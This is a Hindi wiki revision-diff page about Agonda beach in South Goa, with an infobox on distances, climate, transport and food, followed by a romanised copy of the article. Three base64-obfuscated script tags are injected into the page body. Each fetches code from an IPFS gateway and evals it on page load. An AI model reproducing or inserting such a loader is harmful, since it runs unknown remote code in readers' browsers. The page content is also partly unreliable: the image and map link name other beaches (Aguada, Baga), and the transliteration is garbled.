Difference between revisions of "अगोंडा तट गोवा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
[[चित्र:Aguada-Beach-Goa.jpg|thumb|250px|अगोंडा तट का एक दृश्य, [[गोवा]]<br />A View Of Aguada Beach, Goa]]
+
{{सूचना बक्सा पर्यटन
 +
|चित्र=Aguada-Beach-Goa.jpg
 +
|चित्र का नाम=अगोंडा तट, [[गोवा]]  
 +
|विवरण=
 +
|राज्य=[[गोवा]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[दक्षिण गोवा ज़िला]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=गोवा की राजधानी [[पणजी]] से 76 किलोमीटर दूर है।
 +
|मौसम=
 +
|तापमान=20° सेल्सियस (सर्दियों में) से 33° सेल्सियस (गर्मियों में) तक
 +
|प्रसिद्धि=
 +
|कब जाएँ=[[सितम्बर]] से [[अप्रैल]]
 +
|कैसे पहुँचें=हवाई जहाज़, रेल, बस, टैक्सी, स्टीमर आदि से पहुँचा जा सकता है।
 +
|हवाई अड्डा=डबोलिम हवाई अड्डा, पणजी हवाई अड्डा
 +
|रेलवे स्टेशन=वास्को रेलवे स्टेशन, मडगांव रेलवे स्टेशन
 +
|बस अड्डा=
 +
|यातायात=टैक्सी, मीटर वाली टैक्सी, बस, नाव
 +
|क्या देखें=
 +
|कहाँ ठहरें=होटल, रिजॉर्ट, सरकारी रिजॉर्ट
 +
|क्या खायें=चावल और मछली करी, मछली से बने व्यंजन, फेनी, काजू फेनी
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=9111
 +
|ए.टी.एम=लगभग सभी
 +
|सावधानी=
 +
|मानचित्र लिंक=[http://maps.google.co.in/maps?q=Baga+Beach+Goa,+india&hl=en&ll=15.564505,73.737144&spn=0.145853,0.338173&sll=15.555658,73.75165&sspn=0.036465,0.084543&vpsrc=6&hnear=Baga+Beach&t=m&z=12 बागा तट गूगल मानचित्र]
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''अगोंडा तट''' दक्षिण गोवा में स्थित है। यह [[पणजी]] से 76 किलोमीटर दूर है।
 
*[[गोवा]] को 'पर्यटकों का स्‍वर्ग' कहते हैं। गोवा एक आकर्षक [[गोवा पर्यटन|पर्यटन]] स्थल है।
 
*[[गोवा]] को 'पर्यटकों का स्‍वर्ग' कहते हैं। गोवा एक आकर्षक [[गोवा पर्यटन|पर्यटन]] स्थल है।
*अगोंडा तट सुनहरी रेत वाला तट है, जो 3 किलोमीटर लंबा है और अगोंडा तट अकेले में आनंद उठाने वाले लोगों के लिए स्‍वर्ग है।  
+
*अगोंडा तट सुनहरी रेत वाला तट है, जो 3 किलोमीटर लंबा है और अगोंडा तट, अकेले में आनंद उठाने वाले लोगों के लिए स्‍वर्ग है।  
 
*इस तट पर लगभग हर समय वीरानी छायी रहती है।  
 
*इस तट पर लगभग हर समय वीरानी छायी रहती है।  
 
*अगोंडा तट पर आकर पर्यटक पूरी तरह से शांति का अनुभव कर सकते हैं।  
 
*अगोंडा तट पर आकर पर्यटक पूरी तरह से शांति का अनुभव कर सकते हैं।  
 
*यह तट सभी आयु के पर्यटकों को आकर्षित करता है।
 
*यह तट सभी आयु के पर्यटकों को आकर्षित करता है।
 
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
  
 
==संबंधित लेख==
 
==संबंधित लेख==

Revision as of 06:04, 17 October 2011

agoanda tat gova
[[chitr:Aguada-Beach-Goa.jpg|agoanda tat, gova|200px|center]]
rajy gova
zila dakshin gova zila
marg sthiti gova ki rajadhani panaji se 76 kilomitar door hai.
tapaman 20° selsiyas (sardiyoan mean) se 33° selsiyas (garmiyoan mean) tak
kab jaean sitambar se aprail
kaise pahuanchean havaee jahaz, rel, bas, taiksi, stimar adi se pahuancha ja sakata hai.
havaee adda dabolim havaee adda, panaji havaee adda
relave steshan vasko relave steshan, madagaanv relave steshan
yatayat taiksi, mitar vali taiksi, bas, nav
kahaan thaharean hotal, rij aaurt, sarakari rij aaurt
kya khayean chaval aur machhali kari, machhali se bane vyanjan, pheni, kajoo pheni
es.ti.di. kod 9111
e.ti.em lagabhag sabhi
chitr:Map-icon.gif baga tat googal manachitr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

agoanda tat dakshin gova mean sthit hai. yah panaji se 76 kilomitar door hai.

  • gova ko 'paryatakoan ka sh‍varg' kahate haian. gova ek akarshak paryatan sthal hai.
  • agoanda tat sunahari ret vala tat hai, jo 3 kilomitar lanba hai aur agoanda tat, akele mean anand uthane vale logoan ke lie sh‍varg hai.
  • is tat par lagabhag har samay virani chhayi rahati hai.
  • agoanda tat par akar paryatak poori tarah se shaanti ka anubhav kar sakate haian.
  • yah tat sabhi ayu ke paryatakoan ko akarshit karata hai.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>